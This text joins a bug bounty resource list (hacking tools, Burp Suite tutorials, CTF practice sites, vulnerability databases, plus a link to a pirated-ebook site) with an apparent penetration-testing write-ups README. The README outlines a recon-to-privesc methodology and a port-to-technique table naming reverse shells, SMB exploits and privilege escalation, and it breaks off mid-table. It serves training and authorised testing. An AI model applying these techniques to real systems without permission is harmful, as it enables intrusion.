https://medium.com/bugbountywriteup/how-to-get-started-into-bug-bounty-1be52b3064e0 **Collection of various PoC helpful for Bug Bounty** https://drive.google.com/folderview?id=14zlqgin6rUfr6jQRBCLbbP8P8Vdypz7x ***For Tips regarding Bug Bounty, you can check out:*** [Book of Bounty Tips](https://gowsundar.gitbook.io/book-of-bugbounty-tips/) *Tools* [dnscan](https://github.com/rbsec/dnscan) [Knockpy](https://github.com/guelfoweb/knock) [Sublist3r](https://github.com/aboul3la/Sublist3r) [massdns](https://github.com/blechschmidt/massdns) [nmap](https://nmap.org) [masscan](https://github.com/robertdavidgraham/masscan) [EyeWitness](https://github.com/ChrisTruncer/EyeWitness) [DirBuster](https://sourceforge.net/projects/dirbuster/) [dirsearch](https://github.com/maurosoria/dirsearch) [Gitrob](https://github.com/michenriksen/gitrob) [git-secrets](https://github.com/awslabs/git-secrets) [sandcastle](https://github.com/yasinS/sandcastle) [bucket_finder](https://digi.ninja/projects/bucket_finder.php) [GoogD0rker](https://github.com/ZephrFish/GoogD0rker/) [Wayback Machine](https://web.archive.org) [waybackurls](https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050) [Sn1per](https://github.com/1N3/Sn1per/) [XRay](https://github.com/evilsocket/xray) [wfuzz](https://github.com/xmendez/wfuzz/) [patator](https://github.com/lanjelot/patator) [datasploit](https://github.com/DataSploit/datasploit) [hydra](https://github.com/vanhauser-thc/thc-hydra) [changeme](https://github.com/ztgrace/changeme) [MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF/ ) [Apktool](https://github.com/iBotPeaches/Apktool) [dex2jar](https://sourceforge.net/projects/dex2jar/) [sqlmap](http://sqlmap.org/) [oxml_xxe](https://github.com/BuffaloWill/oxml_xxe/) [XXE Injector](https://github.com/enjoiz/XXEinjector) [The JSON Web Token Toolkit](https://github.com/ticarpi/jwt_tool) [ground-control](https://github.com/jobertabma/ground-control) [ssrfDetector](https://github.com/JacobReynolds/ssrfDetector) [LFISuit](https://github.com/D35m0nd142/LFISuite) [GitTools](https://github.com/internetwache/GitTools) [dvcs-ripper](https://github.com/kost/dvcs-ripper) [tko-subs](https://github.com/anshumanbh/tko-subs) [HostileSubBruteforcer](https://github.com/nahamsec/HostileSubBruteforcer ) [Race the Web](https://github.com/insp3ctre/race-the-web) [ysoserial](https://github.com/GoSecure/ysoserial) [PHPGGC](https://github.com/ambionics/phpggc) [CORStest](https://github.com/RUB-NDS/CORStest) [retire-js](https://github.com/RetireJS/retire.js) [getsploit](https://github.com/vulnersCom/getsploit) [Findsploit](https://github.com/1N3/Findsploit) [bfac](https://github.com/mazen160/bfac) [WPScan](https://wpscan.org/) [CMSMap](https://github.com/Dionach/CMSmap) [Amass](https://github.com/OWASP/Amass) ### Burp Suite A collection of videos to understand the working of Burpsuite. [Burp Suite Fundamentals](https://www.youtube.com/playlist?list=PLNpPFYUlHmcVK--npOAVJBVnpYvDWOXma) ### Burp Suite Payloads A series of tutorials to understand Burpsuite Payloads and Payload Processing [Beginners Guide to Burpsuite Payloads (Part 1)](https://lnkd.in/g3yeUsi) [Beginners Guide to Burpsuite Payloads (Part 2)](https://lnkd.in/ggrmkeq) [Payload Processing Rule in Burp suite (Part 1)](https://Inkd.in/gN2-s7f) [Payload Processing Rule in Burp suite (Part 2)](https://Inkd.in/gjtTqs7) [Engagement Tools Tutorial in Burp suite](https://lnkd.in/gc7jxcd) ### EBooks Part of Z-Library project. The world's largest ebook library. [Zlibrary.Asia](https://b-ok.asia/) ### HTTP Status Codes - 400 (Bad request) - 401 (Authorization required) - 402 (Payment required) - 403 (Forbidden) - 404 (Not found) - 405 (Method not allowed) - 406 (Not acceptable) - 407 (Proxy authentication required) - 408 (Request Timeout) - 409 (Conflict) - 410 (Gone) - 411 (Length required) - 412 (Precondition failed) - 413 (Request entity too large) - 414 (Request URI too large) - 415 (Unsupported media type) - 416 (Request range not satisfiable) - 417 (Expectation failed) - 422 (Unprocessable entity) - 423 (Locked) - 424 (Failed dependency) - 500 (Internal server error) - 501 (Not Implemented) - 502 (Bad gateway) - 503 (Service unavailable) - 504 (Gateway timeout) - 505 (HTTP version not supported) - 506 (Variant also negotiates) - 507 (Insufficient storage) - 510 (Not extended) ### Test your Hacking skills - [Pwnable.kr](https://pwnable.kr/) - [hack.me](https://hack.me/) - [CTFlearn](https://ctflearn.com/) - [Web Application Exploits and Defenses ](https://google-gruyere.appspot.com/) - [RootMe](https://www.root-me.org/en/) - [HackTheBox](https://www.hackthebox.eu/) - [Game of Hacks](http://www.gameofhacks.com/) - [OverTheWire](https://overthewire.org/) - [Microcorruption](https://microcorruption.com/) - [XSS Challenges](https://xss-game.appspot.com/?utm_source...dium=email) - [Hack This Site](https://www.hackthissite.org/pages/index/index.php) - [crackmes.one](https://crackmes.one/) - [Pentest Training](https://pentest.training/) - [This is Legal](https://thisislegal.com/) - [Try Hack Me](https://tryhackme.com/) - [Vulnhub](https://www.vulnhub.com) - [Practical Pentest Labs](https://practicalpentestlabs.com) - [Labs Wizard Security](https://labs.wizard-security.net) - [Pentestlab](https://pentesterlab.com/) - [Hackthis](https://www.hackthis.co.uk) - [Shellter](https://shellterlabs.com/pt/) - [Root-Me](https://www.root-me.org/) - [Zenk-Security](https://www.zenk-security.com/epreuves.php) - [W3Challs](https://w3challs.com/) - [NewbieContest](https://www.newbiecontest.org/) - [The Cryptopals Crypto Challenges](https://cryptopals.com/) - [Penetration Testing Practice Labs](http://www.amanhardikar.com/mindmaps/Practice.html) - [alert(1) to win](https://alf.nu/alert1) - [Hacksplaining](https://www.hacksplaining.com/exercises) - [Hacker101](https://ctf.hacker101.com) - [Academy Hackaflag](https://academy.hackaflag.com.br/) - [PentestIT LAB](https://lab.pentestit.ru) - [Hacker Security](https://capturetheflag.com.br/) - [PicoCTF](https://picoctf.com) - [Explotation Education](https://exploit.education/) - [Root in Jail](http://ctf.rootinjail.com) - [CMD Challenge](https://cmdchallenge.com) - [Hacking-Lab](https://www.hacking-lab.com/index.html) - [PWNABLE](https://pwnable.kr/play.php) - [WHO4REYOU](https://34.73.111.210) - [Google CTF](https://capturetheflag.withgoogle.com/) - [ImmersiveLabs](https://immersivelabs.com/) - [Attack-Defense](https://attackdefense.com/) - [SANS Challenger](https://www.holidayhackchallenge.com/) - [SmashTheStack](http://smashthestack.org/wargames.html) ### Vulnerability Databases And Resources Vulnerability Databases are the first place to start your day as a security professional. Any new vulnerability detection is generally available through public vulnerability databases. These databases are a big source of information for hackers to be able to understand and exploit/avoid/fix the vulnerability. Some Public Sources for you - - [Exploit-db](http://www.exploit-db.com/) - [Vulners](http://securityvulns.com/) - [Security Focus](http://www.securityfocus.com/) - [SecuriTeam](http://www.securiteam.com/) - [Secunia Research](http://secunia.com/advisories/) - [Zero Day Initiative](http://zerodayinitiative.com/advisories/published/) - [National Vulnerability Database](https://nvd.nist.gov) - [CVE Details](http://cvedetails.com/) - [Vulnerability & Exploit Database ](http://www.rapid7.com/vulndb/index.jsp) - [Open Vulnerability and Assessment Language](http://oval.mitre.org) --- ### Contributing Read how to [contribute to CSec](contributing.md). ### License ``` MIT License Copyright (c) 2020 We Are Plymouth's Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ```
# 📖 ReadMe [![License: CC BY-SA 4.0](https://raw.githubusercontent.com/7h3rAm/7h3rAm.github.io/master/static/files/ccbysa4.svg)](https://creativecommons.org/licenses/by-sa/4.0/) <a name="contents"></a> ## 🔖 Contents - ☀️ [Methodology](#methodology) * ⚙️ [Phase 0: Recon](#mrecon) * ⚙️ [Phase 1: Enumerate](#menumerate) * ⚙️ [Phase 2: Exploit](#mexploit) * ⚙️ [Phase 3: PrivEsc](#mprivesc) - ☀️ [Stats](#stats) * 📊 [Counts](#counts) * 📊 [Top Categories](#topcategories) * 📊 [Top Ports/Protocols/Services](#topportsprotocolsservices) * 📊 [Top TTPs](#topttps) - ⚡ [Mapping](#mapping) - 💥 [Machines](#machines) - ☢️ [TTPs](#ttps) * ⚙️ [Enumerate](#enumerate) * ⚙️ [Exploit](#exploit) * ⚙️ [PrivEsc](#privesc) - ⚡ [Tips](#tips) - 💥 [Tools](#tools) - 🔥 [Loot](#loot) * 🔑 [Credentials](#credentials) * 🔑 [Hashes](#hashes) <a name="methodology"></a> ## ☀️ Methodology [↟](#contents) <a name="mrecon"></a> ### ⚙️ Phase #0: Recon [🡑](#methodology) **Goal**: to scan all ports on &lt;targetip&gt; **Process**: * [enumerate_nmap_initial](#enumerate_nmap_initial) * [enumerate_nmap_tcp](#enumerate_nmap_tcp) * [enumerate_nmap_udp](#enumerate_nmap_udp) <a name="menumerate"></a> ### ⚙️ Phase #1: Enumerate [🡑](#methodology) **Goal**: to find service and version details **Process**: * find ttps for open ports * start with weird services * identify installed software and version * find critical cve/exploits * enumerate more common services - smb/ftp * enumerate services with large attack vector like http at the end <a name="mexploit"></a> ### ⚙️ Phase #2: Exploit [🡑](#methodology) **Goal**: gain interactive access on &lt;targetip&gt; **Process**: * debug available exploits for open ports <a name="mprivesc"></a> ### ⚙️ Phase #3: PrivEsc [🡑](#methodology) **Goal**: gain elevated privileges on &lt;targetip&gt; **Process**: * debug available exploits or misconfigurations * for nix, use [linux smart enum](https://github.com/diego-treitos/linux-smart-enumeration) * for windows, use [winpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) <a name="stats"></a> ## ☀️ Stats [↟](#contents) ### 📊 Counts [🡑](#stats) | # | TryHackMe | HackTheBox | VulnHub | OSCPlike | Owned | |:--------:|:---------------:|:----------------:|:-----------------:|:-----------------:|:-----------------:| | Total | `1/481 (0.21%)` | `25/257 (9.73%)` | `24/725 (3.31%)` | `46/254 (18.11%)` | `50/1463 (3.42%)` | | Windows | `0/0 (0.00%)` | `12/73 (16.44%)` | `0/2 (0.00%)` | `12/39 (30.77%)` | `12/75 (16.00%)` | | *nix | `0/0 (0.00%)` | `13/184 (7.07%)` | `24/723 (3.32%)` | `34/177 (19.21%)` | `37/907 (4.08%)` | | OSCPlike | `0/38 (0.00%)` | `25/94 (26.60%)` | `21/122 (17.21%)` | | `46/254 (18.11%)` | <a name="topcategories"></a> ### 📊 Top Categories [🡑](#stats) <img src="./top_categories.png" height="320" /> <a name="topportsprotocolsservices"></a> ### 📊 Top Ports/Protocols/Services [🡑](#stats) <img src="./top_ports.png" height="320" /> --- <img src="./top_protocols.png" height="320" /> --- <img src="./top_services.png" height="320" /> <a name="topttps"></a> ### 📊 Top TTPs [🡑](#stats) <img src="./top_ttps_enumerate.png" height="320" /> --- <img src="./top_ttps_exploit.png" height="320" /> --- <img src="./top_ttps_privesc.png" height="320" /> <a name="mapping"></a> ## ⚡ Mapping [↟](#contents) | # | Port | Service | TTPs | TTPs - ITW | |---|------|-----------|------|------------| | 1. | `21/tcp` | `ftp/Microsoft ftpd`<br /><br />`ftp/vsftpd 2.3.5` | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp) | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root) | | 2. | `22/tcp` | `ssh/OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)`<br /><br />`ssh/OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)`<br /><br />`ssh/OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)`<br /><br />`ssh/OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)` | [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh) | [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 3. | `23/tcp` | | [`enumerate_proto_telnet`](https://github.com/7h3rAm/writeups#enumerate_proto_telnet) | | | 4. | `25/tcp` | | [`enumerate_proto_smtp`](https://github.com/7h3rAm/writeups#enumerate_proto_smtp) | | | 5. | `53/tcp` | | [`enumerate_proto_dns`](https://github.com/7h3rAm/writeups#enumerate_proto_dns) | | | 6. | `79/tcp` | | [`enumerate_proto_finger`](https://github.com/7h3rAm/writeups#enumerate_proto_finger) | | | 7. | `80/tcp` | `http/2.4.18 ((Ubuntu))`<br /><br />`http/Apache httpd`<br /><br />`http/Apache httpd 2.0.52 ((CentOS))`<br /><br />`http/Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)`<br /><br />`http/Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)`<br /><br />`http/Apache httpd 2.2.22 ((Ubuntu))`<br /><br />`http/Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)`<br /><br />`http/Apache httpd 2.4.18 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.25 ((Debian))`<br /><br />`http/Apache httpd 2.4.29`<br /><br />`http/Apache httpd 2.4.29 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.34 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.41 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.7 ((Ubuntu))`<br /><br />`http/HttpFileServer httpd 2.3`<br /><br />`http/Microsoft IIS httpd 6.0`<br /><br />`http/Microsoft IIS httpd 7.5` | [`enumerate_app_apache`](https://github.com/7h3rAm/writeups#enumerate_app_apache), [`enumerate_app_apache_tomcat`](https://github.com/7h3rAm/writeups#enumerate_app_apache_tomcat), [`enumerate_app_coldfusion_files`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_files), [`enumerate_app_coldfusion_version`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_version), [`enumerate_app_drupal`](https://github.com/7h3rAm/writeups#enumerate_app_drupal), [`enumerate_app_joomla`](https://github.com/7h3rAm/writeups#enumerate_app_joomla), [`enumerate_app_phpmyadmin`](https://github.com/7h3rAm/writeups#enumerate_app_phpmyadmin), [`enumerate_app_prtg`](https://github.com/7h3rAm/writeups#enumerate_app_prtg), [`enumerate_app_webmin`](https://github.com/7h3rAm/writeups#enumerate_app_webmin), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_proto_webdav`](https://github.com/7h3rAm/writeups#enumerate_proto_webdav) | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | | 8. | `111/tcp` | | [`enumerate_proto_nfs`](https://github.com/7h3rAm/writeups#enumerate_proto_nfs), [`enumerate_proto_rpc`](https://github.com/7h3rAm/writeups#enumerate_proto_rpc) | | | 9. | `135/tcp` | | [`enumerate_proto_rpc`](https://github.com/7h3rAm/writeups#enumerate_proto_rpc) | | | 10. | `139/tcp` | `netbios-ssn/Microsoft Windows netbios-ssn`<br /><br />`netbios-ssn/Samba smbd 3.X - 4.X (workgroup: WORKGROUP)` | [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067), [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067), [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_usermap`](https://github.com/7h3rAm/writeups#exploit_smb_usermap), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root) | | 11. | `161/tcp` | | [`enumerate_proto_snmp`](https://github.com/7h3rAm/writeups#enumerate_proto_snmp) | | | 12. | `389/tcp` | | [`enumerate_proto_ldap`](https://github.com/7h3rAm/writeups#enumerate_proto_ldap) | | | 13. | `443/tcp` | `ssl/https/Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b` | [`enumerate_app_apache`](https://github.com/7h3rAm/writeups#enumerate_app_apache), [`enumerate_app_apache_tomcat`](https://github.com/7h3rAm/writeups#enumerate_app_apache_tomcat), [`enumerate_app_coldfusion_files`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_files), [`enumerate_app_coldfusion_version`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_version), [`enumerate_app_drupal`](https://github.com/7h3rAm/writeups#enumerate_app_drupal), [`enumerate_app_joomla`](https://github.com/7h3rAm/writeups#enumerate_app_joomla), [`enumerate_app_phpmyadmin`](https://github.com/7h3rAm/writeups#enumerate_app_phpmyadmin), [`enumerate_app_prtg`](https://github.com/7h3rAm/writeups#enumerate_app_prtg), [`enumerate_app_webmin`](https://github.com/7h3rAm/writeups#enumerate_app_webmin), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_proto_webdav`](https://github.com/7h3rAm/writeups#enumerate_proto_webdav) | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | | 14. | `445/tcp` | `microsoft-ds/Windows Server 2019 Standard 17763 microsoft-ds` | [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067), [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | | 15. | `636/tcp` | | [`enumerate_proto_ldap`](https://github.com/7h3rAm/writeups#enumerate_proto_ldap) | | | 16. | `1337/tcp` | `http/Apache httpd 2.4.7 ((Ubuntu))` | | [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 17. | `1433/tcp` | `ms-sql-s/Microsoft SQL Server 14.00.1000.00` | [`enumerate_proto_mssql`](https://github.com/7h3rAm/writeups#enumerate_proto_mssql), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig) | [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell) | | 18. | `1521/tcp` | | [`enumerate_proto_oracle`](https://github.com/7h3rAm/writeups#enumerate_proto_oracle), [`enumerate_proto_postgres`](https://github.com/7h3rAm/writeups#enumerate_proto_postgres) | | | 19. | `1974/tcp` | | | [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 20. | `2049/tcp` | `nfs_acl/2-3 (RPC #100227)`<br /><br />`nfs_acl/3 (RPC #100227)` | [`enumerate_proto_nfs`](https://github.com/7h3rAm/writeups#enumerate_proto_nfs) | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid) | | 21. | `3000/tcp` | `http/Node.js Express framework` | | [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 22. | `3232/tcp` | | [`enumerate_proto_distcc`](https://github.com/7h3rAm/writeups#enumerate_proto_distcc) | | | 23. | `3306/tcp` | | [`enumerate_proto_mysql`](https://github.com/7h3rAm/writeups#enumerate_proto_mysql) | | | 24. | `6660/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 25. | `6661/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 26. | `6662/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 27. | `6663/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 28. | `6664/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 29. | `6665/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 30. | `6666/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 31. | `6667/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 32. | `6668/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 33. | `6669/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 34. | `7000/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 35. | `8080/tcp` | `http/Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)`<br /><br />`http/Apache httpd 2.4.29 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)` | [`enumerate_app_apache`](https://github.com/7h3rAm/writeups#enumerate_app_apache), [`enumerate_app_apache_tomcat`](https://github.com/7h3rAm/writeups#enumerate_app_apache_tomcat), [`enumerate_app_coldfusion_files`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_files), [`enumerate_app_coldfusion_version`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_version), [`enumerate_app_drupal`](https://github.com/7h3rAm/writeups#enumerate_app_drupal), [`enumerate_app_joomla`](https://github.com/7h3rAm/writeups#enumerate_app_joomla), [`enumerate_app_phpmyadmin`](https://github.com/7h3rAm/writeups#enumerate_app_phpmyadmin), [`enumerate_app_prtg`](https://github.com/7h3rAm/writeups#enumerate_app_prtg), [`enumerate_app_webmin`](https://github.com/7h3rAm/writeups#enumerate_app_webmin), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_proto_rdp`](https://github.com/7h3rAm/writeups#enumerate_proto_rdp), [`enumerate_proto_webdav`](https://github.com/7h3rAm/writeups#enumerate_proto_webdav) | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), 